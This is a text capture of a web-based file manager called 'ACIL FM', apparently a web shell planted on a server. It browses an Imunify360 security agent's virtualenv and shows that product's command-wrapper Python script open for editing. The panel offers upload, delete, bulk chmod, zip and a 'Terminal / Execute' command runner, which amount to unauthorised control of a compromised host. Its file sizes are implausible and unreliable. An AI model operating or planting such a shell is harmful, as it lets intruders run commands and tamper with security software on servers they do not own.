ACIL FM
Dark
Refresh
Current DIR:
/opt/imunify360/venv/bin
/
opt
imunify360
venv
bin
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
__pycache__
-
chmod
Open
Rename
Delete
activate
1.69 MB
chmod
View
DL
Edit
Rename
Delete
activate.csh
958 B
chmod
View
DL
Edit
Rename
Delete
activate.fish
2.18 MB
chmod
View
DL
Edit
Rename
Delete
Activate.ps1
8.82 MB
chmod
View
DL
Edit
Rename
Delete
distro
264 B
chmod
View
DL
Edit
Rename
Delete
docutils
275 B
chmod
View
DL
Edit
Rename
Delete
imunify360-command-wrapper
9.14 MB
chmod
View
DL
Edit
Rename
Delete
imunify360_pam.py
47.68 MB
chmod
View
DL
Edit
Rename
Delete
jsonschema
272 B
chmod
View
DL
Edit
Rename
Delete
normalizer
303 B
chmod
View
DL
Edit
Rename
Delete
pam_pureftpd_hook.py
2.15 MB
chmod
View
DL
Edit
Rename
Delete
pip
280 B
chmod
View
DL
Edit
Rename
Delete
pip3
280 B
chmod
View
DL
Edit
Rename
Delete
pip3.11
280 B
chmod
View
DL
Edit
Rename
Delete
pw-migrate
274 B
chmod
View
DL
Edit
Rename
Delete
pwiz.py
8.06 MB
chmod
View
DL
Edit
Rename
Delete
pw_migrate
274 B
chmod
View
DL
Edit
Rename
Delete
pybabel
281 B
chmod
View
DL
Edit
Rename
Delete
python
symlink
15.01 MB
chmod
View
DL
Edit
Rename
Delete
python3
symlink
15.01 MB
chmod
View
DL
Edit
Rename
Delete
python3.11
symlink
15.01 MB
chmod
View
DL
Edit
Rename
Delete
rst2html.py
661 B
chmod
View
DL
Edit
Rename
Delete
rst2html4.py
783 B
chmod
View
DL
Edit
Rename
Delete
rst2html5.py
1.09 MB
chmod
View
DL
Edit
Rename
Delete
rst2latex.py
860 B
chmod
View
DL
Edit
Rename
Delete
rst2man.py
683 B
chmod
View
DL
Edit
Rename
Delete
rst2odt.py
849 B
chmod
View
DL
Edit
Rename
Delete
rst2odt_prepstyles.py
655 B
chmod
View
DL
Edit
Rename
Delete
rst2pseudoxml.py
668 B
chmod
View
DL
Edit
Rename
Delete
rst2s5.py
704 B
chmod
View
DL
Edit
Rename
Delete
rst2xetex.py
940 B
chmod
View
DL
Edit
Rename
Delete
rst2xml.py
669 B
chmod
View
DL
Edit
Rename
Delete
rstpep2html.py
737 B
chmod
View
DL
Edit
Rename
Delete
Edit file: /opt/imunify360/venv/bin/imunify360-command-wrapper
#!/opt/imunify360/venv/bin/python3 import base64 import subprocess import json import os import time import fileinput import socket import select import shutil import random import string import sys from urllib.parse import urlencode # this code is duplicated in installation.py because execute.py file is # copied into /usr/bin directory in .spec. To handle it we can: # 1. Create package in /opt/alt, but: # 1.1 In plesk extension case python38 is installed after this code # 2. Save code in var/etc directories and use symlinks technique, but: # 2.1 Again, plesk extension # 2.2 Symlinks may be disabled in the system # (so endusers will not be able to use extension) # 2.3 This directories are not intended for such usage # (var is even deletable) # 3. Store this files in new place in each extension # 3.1 There are 4 extensions * 2 os types # also present in installation.py class Status: INSTALLING = "installing" UPGRADING = "upgrading" OK = "running" NOT_INSTALLED = "not_installed" DOWNGRADING = "downgrading" FAILED_TO_INSTALL = "failed_to_install" STOPPED = "stopped" SOCKET_INACCESSIBLE = "socket_inaccessible" class ImunifyPluginDeployScript: IMUNIFY_360 = "i360deploy.sh" IMUNIFY_AV = "imav-deploy.sh" def is_i360_downgrade_running() -> bool: try: proc = subprocess.run(["ps", "ax", "-o", "args="], stdout=subprocess.PIPE, check=False) ps_text = proc.stdout.decode("utf-8", "ignore") for line in ps_text.splitlines(): if ImunifyPluginDeployScript.IMUNIFY_360 in line: tokens = line.split() if ("-d" in tokens) or ("--downgrade" in tokens): return True except Exception: # be conservative: failure to detect should not break regular flow pass return False def get_status(): if is_in_upgrade_process(): return Status.UPGRADING # Fast path: lightweight check if deploy scripts are running proc = subprocess.Popen(["ps", "ax"], stdout=subprocess.PIPE) output = proc.stdout.read() is_i360_running = ImunifyPluginDeployScript.IMUNIFY_360.encode() in output is_imav_running = ImunifyPluginDeployScript.IMUNIFY_AV.encode() in output if is_i360_running and is_i360_downgrade_running(): return Status.DOWNGRADING if is_i360_running or is_imav_running: return Status.INSTALLING else: sock = None try: sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) sock.connect("/var/run/defence360agent/simple_rpc.sock") return Status.OK except PermissionError: return Status.SOCKET_INACCESSIBLE except Exception: if os.path.exists("/usr/bin/imunify360-agent"): return Status.STOPPED else: try: if os.path.exists( "/usr/local/psa/var/modules/" "imunify360/installation.log" ): return Status.FAILED_TO_INSTALL except: # noqa pass return Status.NOT_INSTALLED finally: if sock is not None: sock.close() SOCKET_PATH_ROOT = "/var/run/defence360agent/simple_rpc.sock" SOCKET_PATH_USER = "/var/run/defence360agent/non_root_simple_rpc.sock" UPGRADE_MARKER_FILE = "/var/imunify360/upgrade_process_started" class ExecuteError(Exception): def __str__(self): return "ExecuteError: " + super(ExecuteError, self).__str__() def is_in_upgrade_process(): return os.path.isfile(UPGRADE_MARKER_FILE) def execute(command): if is_in_upgrade_process(): handle_upgrading(command) return socket_path = SOCKET_PATH_ROOT if os.getegid() == 0 else SOCKET_PATH_USER try: with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as sock: sock.connect(socket_path) sock.sendall(str.encode(command) + b"\n") fd_list = [sock.fileno()] rwx_list = select.select(fd_list, [], [], 180) if sock.fileno() not in rwx_list[0]: raise Exception("Request timeout") response = sock.makefile(encoding="utf-8").readline() if not response: raise Exception("Empty response from socket") print(response) except (ConnectionRefusedError, FileNotFoundError, PermissionError): print_response() def print_response(resp_data=None, resp_status=None, result="error"): if resp_status is None: resp_status = get_status() print( json.dumps( dict( result=result, messages=[], data=resp_data, status=resp_status, ) ) ) def _get_chunk(offset, limit): try: with open("/var/log/i360deploy.log", "r") as f: f.seek(offset) for i in range(10): chunk = f.read(limit) if chunk == "": time.sleep(1) else: return chunk except (IOError, OSError, ValueError): return "Error reading file i360deploy.log" return "" def print_upgrading_status(offset, limit): chunk = _get_chunk(offset, limit) resp_data = dict( items=dict( log=chunk, offset=offset + len(chunk), ) ) print_response( resp_data, resp_status=Status.UPGRADING, result="success", ) def handle_upgrading(command): request = json.loads(command) if request.get("command") == ["upgrading", "status"]: params = request.get("params") print_upgrading_status(params["offset"], params["limit"]) else: print_response(resp_status=get_status(), result="error") def upload_file(params): params = json.loads(params) upload_path = "/var/imunify360/uploads" uploaded = [] for tmp_path, file_name in params.get("files", {}).items(): file_name = file_name.encode("utf-8") path = os.path.join(bytes(upload_path, "utf-8"), file_name) shutil.move(tmp_path.encode("utf-8"), path) os.chown(path, 0, 0) os.chmod(path, 0o600) uploaded.append(path) random_name = "".join( random.choice(string.ascii_uppercase + string.digits) for _ in range(8) ) zip_file = random_name + ".zip" zip_path = os.path.join("/var/imunify360/uploads", zip_file) subprocess.call( ["zip", "-j", "-m", "--password", "1", zip_path] + uploaded, stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT, shell=False, ) os.chown(zip_path, 0, 0) os.chmod(zip_path, 0o600) result = { "result": "success", "data": zip_path, } print(json.dumps(result)) # Imunify Email IMUNIFYEMAIL_SOCKET_PATH = "/var/run/imunifyemail/quarantine.sock" if os.path.exists(IMUNIFYEMAIL_SOCKET_PATH): import urllib3.connection class HttpUdsConnection(urllib3.connection.HTTPConnection): def __init__(self, socket_path, *args, **kw): self.socket_path = socket_path super().__init__(*args, **kw) def connect(self): self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) self.sock.connect(self.socket_path) def imunifyemail(command): command = json.loads(command) con = HttpUdsConnection(IMUNIFYEMAIL_SOCKET_PATH, "localhost") url = ("/quarantine/api/v1/" + "/".join(command["command"])).format( account_name=command["username"] ) try: con.request( command["params"]["request_method"].upper(), url + "?" + urlencode(command["params"], doseq=True), body=json.dumps(command["params"]), ) except Exception as e: print( json.dumps( { "messages": str(e), "result": "error", } ) ) return data = [] response = con.getresponse() response_text = response.read() if response_text: response_text = json.loads(response_text) or [] if "items" in response_text: data = response_text else: data = dict(items=response_text) messages = ( "Something went wrong please try again" if response.status != 200 else "" ) print( json.dumps( dict( result="success" if response.status == 200 else "error", messages=messages, status=response.status, data=data, ) ) ) if __name__ == "__main__": action = sys.argv[1] encoded_data = fileinput.input(files=sys.argv[2:]).readline() data = base64.b64decode(encoded_data).decode() dispatcher = { "execute": execute, "uploadFile": upload_file, "imunifyEmail": imunifyemail, } try: dispatcher.get(action, execute)(data) except Exception as e: print( json.dumps( { "messages": str(e), "result": "error", } ) )
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply